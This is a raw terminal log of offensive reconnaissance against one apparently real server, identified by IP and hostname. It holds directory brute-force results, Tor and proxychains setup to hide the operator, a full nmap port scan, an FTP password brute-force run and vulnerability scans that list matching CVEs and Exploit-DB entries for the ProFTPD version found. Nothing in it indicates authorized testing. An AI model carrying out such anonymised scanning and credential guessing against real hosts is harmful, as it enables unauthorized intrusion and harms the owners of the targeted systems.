+ http://184.154.192.250/2012/01/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/01/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/04/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/04/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/04/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/04/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/04/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/04/96 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/05/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/06/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/06/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/06/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/06/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/06/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/06/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/07/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/07/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/07/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/07/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/07/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/07/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/08/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/08/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/08/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/08/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/08/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/08/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/1/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/1/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/1/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/1/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/1/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/1/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/4/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/4/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/4/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/4/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/4/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/4/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/5/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/5/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/5/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/5/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/5/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/5/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/6/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/6/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/6/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/6/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/6/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/6/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/7/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/7/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/7/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/7/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/7/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/7/96 (CODE:200|SIZE:13756)

+ http://184.154.192.250/2012/8/32 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/8/42 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/8/50 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/8/51 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/8/64 (CODE:200|SIZE:13756)
+ http://184.154.192.250/2012/8/96 (CODE:200|SIZE:13756)
---- Entering directory: http://184.154.192.250/2012/embed/ ----

+ http://184.154.192.250/2012/embed/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/embed/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/embed/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/embed/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/embed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/2012/feed/ ----
+ http://184.154.192.250/2012/feed/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/feed/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/feed/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/2012/feed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/ads/_notes/ ----

+ http://184.154.192.250/ads/_notes/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/ads/_notes/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/ads/_notes/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/ads/_notes/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/ads/_notes/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/ads/_notes/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/0/ ----

+ http://184.154.192.250/blog/0/index.php (CODE:301|SIZE:0)

+ http://184.154.192.250/blog/2011/13 (CODE:200|SIZE:13756)
+ http://184.154.192.250/blog/2011/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2011/page1 (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2011/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2011/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2011/rss2 (CODE:301|SIZE:0)

+ http://184.154.192.250/blog/2012/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2012/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2012/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/2012/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/embed/ ----

+ http://184.154.192.250/blog/embed/index.php (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/feed/ ----

+ http://184.154.192.250/blog/feed/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/feed/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/feed/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/feed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/uncategorized/ ----

+ http://184.154.192.250/blog/uncategorized/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/uncategorized/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/uncategorized/page1 (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/uncategorized/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/uncategorized/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/blog/uncategorized/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/wp-admin/ ----

+ http://184.154.192.250/blog/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://184.154.192.250/blog/wp-admin/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/blog/wp-admin/index.php (CODE:302|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/wp-content/ ----

+ http://184.154.192.250/blog/wp-content/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/blog/wp-content/index.php (CODE:200|SIZE:0)
---- Entering directory: http://184.154.192.250/blog/wp-includes/ ----

+ http://184.154.192.250/blog/wp-includes/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/blog/wp-includes/index.php (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/Blog/0/ ----

+ http://184.154.192.250/Blog/0/index.php (CODE:301|SIZE:0)

+ http://184.154.192.250/Blog/2011/13 (CODE:200|SIZE:13756)
+ http://184.154.192.250/Blog/2011/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2011/page1 (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2011/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2011/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2011/rss2 (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2012/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2012/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2012/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/2012/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/Blog/embed/ ----

+ http://184.154.192.250/Blog/embed/index.php (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/Blog/feed/ ----

+ http://184.154.192.250/Blog/feed/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/feed/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/feed/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/feed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/Blog/uncategorized/ ----

+ http://184.154.192.250/Blog/uncategorized/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/uncategorized/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/uncategorized/page1 (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/uncategorized/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/uncategorized/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/Blog/uncategorized/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/contact-us/_notes/ ----

+ http://184.154.192.250/contact-us/_notes/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/contact-us/_notes/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/contact-us/_notes/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/contact-us/_notes/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/contact-us/_notes/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/contact-us/_notes/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/feed/atom/ ----

+ http://184.154.192.250/feed/atom/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/atom/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/atom/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/atom/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/atom/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/atom/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/feed/rdf/ ----

+ http://184.154.192.250/feed/rdf/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/rdf/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/rdf/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/rdf/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/rdf/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/feed/rdf/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/include/_notes/ ----

+ http://184.154.192.250/include/_notes/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/include/_notes/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/include/_notes/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/include/_notes/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/include/_notes/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/include/_notes/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/test/file/ ----

+ http://184.154.192.250/test/file/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/test/file/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/test/file/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/test/file/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/test/file/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/test/file/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/test/images/ ----

+ http://184.154.192.250/test/images/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/test/images/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/test/images/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/test/images/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/test/images/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/test/images/rss2 (CODE:301|SIZE:0)
+ http://184.154.192.250/test/images/Thumbs.db (CODE:200|SIZE:27648)
---- Entering directory: http://184.154.192.250/time/Image/ ----

+ http://184.154.192.250/time/Image/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/time/Image/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/time/Image/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/time/Image/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/time/Image/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/time/Image/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/uncategorized/feed/ ----

+ http://184.154.192.250/uncategorized/feed/feed (CODE:301|SIZE:0)
+ http://184.154.192.250/uncategorized/feed/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/uncategorized/feed/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/uncategorized/feed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/WEB-INF/classes/ ----

+ http://184.154.192.250/WEB-INF/classes/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/WEB-INF/classes/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/classes/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/classes/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/classes/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/classes/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/WEB-INF/lib/ ----

+ http://184.154.192.250/WEB-INF/lib/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/WEB-INF/lib/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/lib/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/lib/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/lib/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/WEB-INF/lib/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/works/flash/ ----

+ http://184.154.192.250/works/flash/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/works/flash/atom (CODE:301|SIZE:0)
+ http://184.154.192.250/works/flash/index.php (CODE:301|SIZE:0)
+ http://184.154.192.250/works/flash/rdf (CODE:301|SIZE:0)
+ http://184.154.192.250/works/flash/rss (CODE:301|SIZE:0)
+ http://184.154.192.250/works/flash/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://184.154.192.250/works/images/ ----

+ http://184.154.192.250/works/images/admin.pl (CODE:403|SIZE:954)
+ http://184.154.192.250/works/images/atom (CODE:301|SIZE:0)
INSTALL TOR
root@blackbox:~# apt-get install tor
START TOR
root@blackbox:~# service tor start
CHECK TOR STATUS
root@blackbox:~# service tor status
CHECK IF ANONYMITY WORKS
root@blackbox:~# proxychains curl http://icanhazip.com

ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| icanhazip.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| icanhazip.com is 104.20.16.242
|S-chain|-<>-127.0.0.1:9050-<><>-104.20.16.242:80-<><>-OK
89.234.157.254
START NMAP THROUGH PROXYCHAINS
root@blackbox:/opt# proxychains nmap -p 1-65535 -T4 -A -v 184.154.192.250 -Pn

--open
Discovered open port 443/tcp on 184.154.192.250

NMAP NSE FTP
root@blackbox:/opt# ls /usr/share/nmap/scripts/ | grep ftp

ftp-anon.nse
ftp-bounce.nse
ftp-brute.nse
ftp-libopie.nse
ftp-proftpd-backdoor.nse
ftp-syst.nse
ftp-vsftpd-backdoor.nse
ftp-vuln-cve2010-4221.nse
tftp-enum.nse
root@blackbox:/opt# proxychains nmap -oN ftp.nmap --script "ftp-brute" --script-

args= -d -Pn -v -p 21 184.154.192.250
PORT STATE SERVICE REASON

21/tcp open ftp syn-ack ttl 49
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 563 guesses in 618 seconds, average tps: 1.1
Final times for host: srtt: 145410 rttvar: 145410 to: 727050
root@blackbox:~# nmap -sV -Pn 184.154.192.250 --open

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:21 CST
Nmap scan report for server.etours.cn (184.154.192.250)
Host is up (0.15s latency).
Not shown: 981 closed ports, 1 filtered port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3e
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp qmail smtpd
53/tcp open domain (unknown banner: none)
80/tcp open http Apache httpd (PleskLin)
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/https?
465/tcp open ssl/smtps?
554/tcp open tcpwrapped
587/tcp open smtp qmail smtpd
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
3306/tcp open mysql MySQL 5.0.77
8443/tcp open ssl/https-alt sw-cp-server
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-
service :
SF-Port53-TCP:V=7.80%I=7%D=1/22%Time=5E28AEC7%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
Service Info: Host: localhost.localdomain; OS: Unix
Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.36 seconds
root@blackbox:/opt# cd /usr/share/nmap/scripts/
root@blackbox:/usr/share/nmap/scripts# git clone
https://github.com/vulnersCom/nmap-vulners.git
root@blackbox:/usr/share/nmap/scripts# git clone
https://github.com/scipag/vulscan.git
root@blackbox:/usr/share/nmap/scripts# ls -la vulscan/*.csv
-rw-r--r-- 1 root root 16756993 Jan 21 04:59 vulscan/cve.csv
-rw-r--r-- 1 root root 1864748 Jan 21 04:59 vulscan/exploitdb.csv
-rw-r--r-- 1 root root 1524310 Jan 21 04:59 vulscan/openvas.csv
-rw-r--r-- 1 root root 6718903 Jan 21 04:59 vulscan/osvdb.csv
-rw-r--r-- 1 root root 7001128 Jan 21 04:59 vulscan/scipvuldb.csv
-rw-r--r-- 1 root root 7227028 Jan 21 04:59 vulscan/securityfocus.csv
-rw-r--r-- 1 root root 1826138 Jan 21 04:59 vulscan/securitytracker.csv
-rw-r--r-- 1 root root 4576711 Jan 21 04:59 vulscan/xforce.csv
root@blackbox:/usr/share/nmap/scripts# cd vulscan/
root@blackbox:/usr/share/nmap/scripts/vulscan# cd utilities/
root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd updater/
root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# chmod +x
updateFiles.sh
root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# ./updateFiles.sh
Downloading https://raw.githubusercontent.com/scipag/vulscan/master/cve.csv...
Downloading
https://raw.githubusercontent.com/scipag/vulscan/master/exploitdb.csv...
Downloading https://raw.githubusercontent.com/scipag/vulscan/master/openvas.csv...
Downloading https://raw.githubusercontent.com/scipag/vulscan/master/osvdb.csv...
Downloading
https://raw.githubusercontent.com/scipag/vulscan/master/scipvuldb.csv...
Downloading
https://raw.githubusercontent.com/scipag/vulscan/master/securityfocus.csv...
Downloading
https://raw.githubusercontent.com/scipag/vulscan/master/securitytracker.csv...
Downloading https://raw.githubusercontent.com/scipag/vulscan/master/xforce.csv...
Returning 0, as no files have been updated, but script ran successfully
root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# cd ..
root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd ..
root@blackbox:/usr/share/nmap/scripts/vulscan# cd ..
root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p21

184.154.192.250
Service Info: OS: Unix

root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p22

184.154.192.250


root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p21

184.154.192.250

| vulscan: VulDB - https://vuldb.com:
| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory
corruption
| [138380] ProFTPD 1.3.5b mod_copy Code Execution
| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of
service
| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD
before 1.3.3g allows remote authenticated users to execute arbitrary code via
vectors involving an error that occurs after an FTP data transfer.
| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD
1.3.3d and earlier allows remote attackers to cause a denial of service (memory
consumption leading to OOM kill) via a malformed SSH message.
| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function
(contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows
remote attackers to cause a denial of service (crash) and possibly execute
arbitrary code via a crafted username containing substitution tags, which are not
properly handled during construction of an SQL query.
| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets
function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute
arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or
(2) FTPS server.
| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc
module in ProFTPD before 1.3.3c allow remote authenticated users to create
directories, delete directories, create symlinks, and modify file timestamps via
directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE
SYMLINK, or (4) SITE UTIME command.
| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before
1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle
a '\0' character in a domain name in the Subject Alternative Name field of an X.509
client certificate, which allows remote attackers to bypass intended client-
hostname restrictions via a crafted certificate issued by a legitimate
Certification Authority, a related issue to CVE-2009-2408.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for
mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows
local users to execute untrusted shared scripts and gain privileges, as
demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi,
a different vulnerability than CVE-2004-0490.
| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive,
allows local users to modify the ownership of arbitrary files via a race condition
and a symlink attack on the (1) MKD or (2) XMKD commands.
| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote
attackers to bypass SQL injection protection mechanisms via invalid, encoded
multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2)
mod_sql_postgres.
| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through
1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%"
(percent) character in the username, which introduces a "'" (single quote)
character during variable substitution by mod_sql.
| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows
remote authenticated users to cause a denial of service (CPU consumption) via an
ABOR command during a data transfer.
| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as
multiple commands, which allows remote attackers to conduct cross-site request
forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI
that leverages an existing session from the FTP client implementation in a web
browser.
| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function
in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to
execute arbitrary code via a large reqarglen length value.
| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set
the buffer size limit when CommandBufferSize is specified in the configuration
file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the
role of CommandBufferSize was originally associated with CVE-2006-5815, but this
was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers
dispute this issue, saying that the relevant memory location is overwritten by
assignment before further use within the affected function, so this is not a
vulnerability.
| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the
mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products,
allows remote attackers to execute arbitrary code via a large data length argument,
| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD
1.3.0 and earlier allows remote attackers, probably authenticated, to cause a
denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a
"ProFTPD remote exploit."
| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows
arbitrary code via a long password.
| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2
allow attackers to cause a denial of service or obtain sensitive information via
(1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo
mod_sql directive.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution
Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [80980] ProFTPD FTP commands symlink
| [71226] ProFTPD pool code execution
| [65207] ProFTPD mod_sftp module denial of service
| [64495] ProFTPD sql_prepare_where() buffer overflow
| [63658] ProFTPD FTP server backdoor
| [63407] mod_sql module for ProFTPD buffer overflow
| [63155] ProFTPD pr_data_xfer denial of service
| [62909] ProFTPD mod_site_misc directory traversal
| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
| [53936] ProFTPD mod_tls SSL certificate security bypass
| [48951] ProFTPD mod_sql username percent SQL injection
| [48558] ProFTPD NLS support SQL injection protection bypass
| [45274] ProFTPD URL cross-site request forgery
| [33733] ProFTPD Auth API security bypass
| [31461] ProFTPD mod_radius buffer overflow
| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
| [30147] ProFTPD sreplace() buffer overflow
| [21530] ProFTPD mod_sql format string attack
| [21528] ProFTPD shutdown message format string attack
| [19410] GProFTPD file name format string attack
| [18453] ProFTPD SITE CHGRP command allows group ownership modification
| [17724] ProFTPD could allow an attacker to obtain valid accounts
| [16038] ProFTPD CIDR entry ACL bypass
| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
| [12369] ProFTPD mod_sql SQL injection
| [12200] ProFTPD ASCII file newline buffer overflow
| [10932] ProFTPD long PASS command buffer overflow
| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
| [7818] ProFTPD ls &quot
| [7816] ProFTPD file globbing denial of service
| [7126] ProFTPD fails to resolve hostnames
| [6433] ProFTPD format string
| [6209] proFTPD /var symlink
| [6208] ProFTPD contains configuration error in postinst script when running as
root
| [5801] proftpd memory leak when using SIZE or USER commands
| [5737] ProFTPD system using mod_sqlpw unauthorized access
|
| Exploit-DB - https://www.exploit-db.com:
| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
